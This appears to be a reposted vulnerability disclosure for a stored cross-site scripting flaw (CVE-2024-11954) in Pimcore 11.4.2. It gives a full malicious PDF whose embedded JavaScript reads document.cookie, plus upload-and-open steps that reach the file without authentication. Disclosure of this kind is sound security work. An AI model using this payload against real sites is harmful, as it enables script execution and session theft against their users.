Pimcore 11.4.2-Stored XSS (CVE-2024–11954)

1 day ago 9
BOOK THIS SPACE FOR AD
ARTICLE AD

Description:

A vulnerability classified as problematic was found in Pimcore 11.4.2. Affected by this vulnerability is an unknown functionality of the component Search Document. The manipulation leads to basic cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.

Affected Component:

https://[ip]/Sample%20Content/Documents/xssmaeitsec.pdf

Payload:

%PDF-1.3
%
1 0 obj
<</Pages 2 0 R /Type /Catalog>>
endobj
2 0 obj
<</Count 1 /Kids [3 0 R] /Type /Pages>>
endobj
3 0 obj
<</AA
<</O
<</JS
(function(){
try{
app.alert(document.cookie);
} catch(e){
app.alert(e.message);
}
})();
)
/S /JavaScript>>>>
/Annots [] /Contents 4 0 R /MediaBox [0 0 612 792] /Parent 2 0 R
/Resources
<</Font <</F1 <</BaseFont /Helvetica /Subtype /Type1 /Type /Font>>>>>>
/Type /Page>>
endobj
4 0 obj
<</Length 21>>
stream

BT
/F1 24 Tf
ET

endstream
endobj
xref
0 5
0000000000 65535 f
0000000015 00000 n
0000000062 00000 n
0000000117 00000 n
0000000424 00000 n
trailer

<</Root 1 0 R /Size 5>>
startxref
493
%%EOF

Proof of Concept:

Log in as Administrator

2. Hover to Assets

3. Right click and click “Add Asset(s) > upload files

4. Upload malicious pdf

5. Click on search and select document

5. copy the path and open to a new tab E.g https://[ip]/Sample%20Content/Documents/xssmaeitsec.pdf

6. XSS PDF can be access without authentication.

7. Image showing no cookies indicator that there are no session currently in

maeitsec
https://www.linkedin.com/in/mheljun-enanoria-557809111/

Read Entire Article